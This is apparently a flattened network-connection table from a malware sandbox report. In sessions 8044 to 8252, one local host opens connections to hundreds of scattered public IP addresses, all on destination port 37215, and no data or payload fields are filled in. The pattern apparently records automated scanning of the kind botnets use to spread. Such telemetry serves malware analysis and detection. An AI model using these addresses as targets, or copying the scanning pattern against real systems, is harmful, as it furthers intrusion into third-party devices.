                                                          8044192.168.2.155211888.191.21.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8045192.168.2.1554468197.241.79.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8046192.168.2.1553944197.66.57.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8047192.168.2.1538272179.3.118.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8048192.168.2.154004495.130.99.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8049192.168.2.154204841.168.175.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8050192.168.2.1559080197.158.109.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8051192.168.2.1559632197.2.10.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8052192.168.2.1533476157.53.103.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8053192.168.2.1557676157.93.112.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8054192.168.2.1547364197.95.110.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8055192.168.2.1536906157.165.210.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8056192.168.2.1553470196.198.207.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8057192.168.2.155955441.81.218.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8058192.168.2.1549852197.39.30.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8059192.168.2.1544116157.59.151.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8060192.168.2.1535120157.246.246.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8061192.168.2.15404184.141.166.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8062192.168.2.1543324166.84.214.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8063192.168.2.1554466157.59.158.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8064192.168.2.155705449.254.193.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8065192.168.2.15447701.222.83.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8066192.168.2.1548750157.70.52.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8067192.168.2.155919073.21.249.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8068192.168.2.1546068157.106.64.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8069192.168.2.155222241.181.100.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8070192.168.2.153597241.73.112.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8071192.168.2.1533252162.234.230.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8072192.168.2.1554674165.173.107.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8073192.168.2.1557728176.205.85.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8074192.168.2.1535554157.45.229.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8075192.168.2.156000441.164.105.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8076192.168.2.153621441.192.149.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8077192.168.2.1548426157.51.67.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8078192.168.2.1538646101.136.194.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8079192.168.2.154944441.153.160.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8080192.168.2.1551572144.105.171.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8081192.168.2.155024841.47.169.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8082192.168.2.1559080197.151.90.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8083192.168.2.1552336197.170.51.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8084192.168.2.1544322157.3.126.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8085192.168.2.1551322197.60.221.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8086192.168.2.155367841.64.236.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8087192.168.2.1548948160.65.163.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8088192.168.2.155183041.170.11.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8089192.168.2.154123034.228.147.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8090192.168.2.1539828197.80.111.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8091192.168.2.155143041.83.65.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8092192.168.2.1555442207.122.240.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8093192.168.2.154606243.28.43.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8094192.168.2.1540674185.54.63.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8095192.168.2.1542498197.159.30.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8096192.168.2.1543586197.242.91.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8097192.168.2.1554828157.54.207.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8098192.168.2.1546326197.122.114.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8099192.168.2.1544678197.169.57.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8100192.168.2.1546820146.145.12.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8101192.168.2.1541758197.89.223.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8102192.168.2.1552590157.105.142.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8103192.168.2.1558998157.158.124.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8104192.168.2.1542958197.31.112.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8105192.168.2.153429841.94.189.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8106192.168.2.155685241.172.160.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8107192.168.2.1553302197.174.128.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8108192.168.2.1558662157.163.104.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8109192.168.2.1545480163.67.29.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8110192.168.2.1543310157.7.117.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8111192.168.2.1546926157.212.234.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8112192.168.2.1542584197.78.141.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8113192.168.2.1550068157.194.83.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8114192.168.2.1557564197.13.143.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8115192.168.2.1553368197.123.15.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8116192.168.2.1536074157.171.123.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8117192.168.2.1540402157.60.203.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8118192.168.2.1548210196.224.139.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8119192.168.2.1554764197.100.3.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8120192.168.2.1536214157.3.1.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8121192.168.2.1544790180.149.59.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8122192.168.2.1546306197.153.127.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8123192.168.2.1536426197.49.171.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8124192.168.2.155932641.221.172.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8125192.168.2.1559422157.78.186.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8126192.168.2.1536620197.100.75.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8127192.168.2.154817441.255.168.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8128192.168.2.153417864.119.106.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8129192.168.2.1539972157.43.63.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8130192.168.2.1554060157.58.142.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8131192.168.2.1547726157.165.136.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8132192.168.2.1533712157.31.23.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8133192.168.2.1539368109.10.139.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8134192.168.2.1535258197.170.81.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8135192.168.2.153431441.109.211.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8136192.168.2.153648241.49.96.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8137192.168.2.155388241.5.75.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8138192.168.2.1543308157.123.207.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8139192.168.2.154369041.239.9.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8140192.168.2.154839452.191.10.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8141192.168.2.1560022209.219.250.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8142192.168.2.154383441.126.87.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8143192.168.2.1543106157.42.77.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8144192.168.2.1558176197.124.237.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8145192.168.2.153560441.207.99.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8146192.168.2.1554298175.19.4.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8147192.168.2.1557810157.107.173.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8148192.168.2.1559522197.103.166.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8149192.168.2.1558768144.216.196.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8150192.168.2.155956841.28.50.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8151192.168.2.1540682197.161.54.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8152192.168.2.1556216197.172.193.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8153192.168.2.1547486157.88.46.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8154192.168.2.154777041.129.221.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8155192.168.2.153934441.199.38.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8156192.168.2.1535976157.42.43.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8157192.168.2.1537594157.157.144.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8158192.168.2.1540200200.133.57.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8159192.168.2.153507041.174.66.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8160192.168.2.1548384197.128.94.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8161192.168.2.153979841.202.159.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8162192.168.2.1548686197.183.196.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8163192.168.2.1533688157.200.146.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8164192.168.2.153745641.167.18.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8165192.168.2.155831241.194.204.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8166192.168.2.1553008157.245.194.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8167192.168.2.153871051.13.15.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8168192.168.2.1544422157.94.133.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8169192.168.2.1541646125.156.212.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8170192.168.2.154845041.110.245.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8171192.168.2.1539532197.98.72.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8172192.168.2.1556244197.49.105.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8173192.168.2.153523241.252.96.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8174192.168.2.1556248197.14.116.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8175192.168.2.1549734158.69.47.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8176192.168.2.1555810197.16.215.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8177192.168.2.153446041.55.156.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8178192.168.2.1538352157.55.226.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8179192.168.2.155711241.162.164.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8180192.168.2.1534650157.159.220.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8181192.168.2.154213641.81.74.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8182192.168.2.1537760197.246.162.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8183192.168.2.1541330197.95.57.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8184192.168.2.155140034.103.210.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8185192.168.2.1550538157.9.63.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8186192.168.2.1544404157.161.121.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8187192.168.2.1556992162.90.163.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8188192.168.2.1553350157.14.98.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8189192.168.2.1537568157.188.65.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8190192.168.2.1558510157.6.58.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8191192.168.2.1550234186.74.207.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8192192.168.2.1560958157.37.133.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8193192.168.2.1542562129.179.249.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8194192.168.2.154185841.244.221.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8195192.168.2.153769241.26.189.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8196192.168.2.155234241.129.213.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8197192.168.2.1544504157.44.103.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8198192.168.2.1557674157.21.162.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8199192.168.2.1535354188.187.68.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8200192.168.2.155806841.183.218.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8201192.168.2.155846441.25.30.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8202192.168.2.1550394157.171.74.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8203192.168.2.1551858218.126.120.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8204192.168.2.1540656197.175.216.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8205192.168.2.1541532197.178.142.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8206192.168.2.1537340157.39.156.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8207192.168.2.1549202157.165.149.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8208192.168.2.1548024218.170.136.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8209192.168.2.1547548197.67.73.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8210192.168.2.154257639.18.82.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8211192.168.2.154101641.220.215.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8212192.168.2.1560706197.153.12.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8213192.168.2.155300641.106.235.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8214192.168.2.1554472197.185.0.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8215192.168.2.1553516197.101.68.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8216192.168.2.1535046197.214.89.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8217192.168.2.155370041.86.112.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8218192.168.2.1556338173.15.56.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8219192.168.2.154583424.44.201.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8220192.168.2.1536754197.236.134.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8221192.168.2.1532934136.55.194.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8222192.168.2.1547324197.211.229.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8223192.168.2.1538236125.231.72.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8224192.168.2.1556810157.121.125.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8225192.168.2.1554448164.219.236.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8226192.168.2.1548956157.93.137.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8227192.168.2.1535172197.242.190.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8228192.168.2.1538902103.43.157.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8229192.168.2.1538848157.225.199.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8230192.168.2.1559700165.57.168.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8231192.168.2.1538746164.83.237.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8232192.168.2.1534848197.233.242.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8233192.168.2.1548286157.89.147.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8234192.168.2.1539682197.114.9.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8235192.168.2.1549620197.249.64.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8236192.168.2.155750241.226.172.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8237192.168.2.1543598157.29.80.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8238192.168.2.1550102157.150.133.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8239192.168.2.1552732117.65.154.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8240192.168.2.154959641.33.202.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8241192.168.2.1537614157.72.242.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8242192.168.2.154887841.13.35.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8243192.168.2.155577641.171.34.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8244192.168.2.154545641.249.238.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8245192.168.2.1536560157.46.23.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8246192.168.2.1535630157.226.230.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8247192.168.2.1534908184.67.58.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8248192.168.2.153835641.73.73.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8249192.168.2.1537994157.128.189.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8250192.168.2.153345641.245.252.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8251192.168.2.1544758197.26.174.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8252192.168.2.155569441.168.49.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
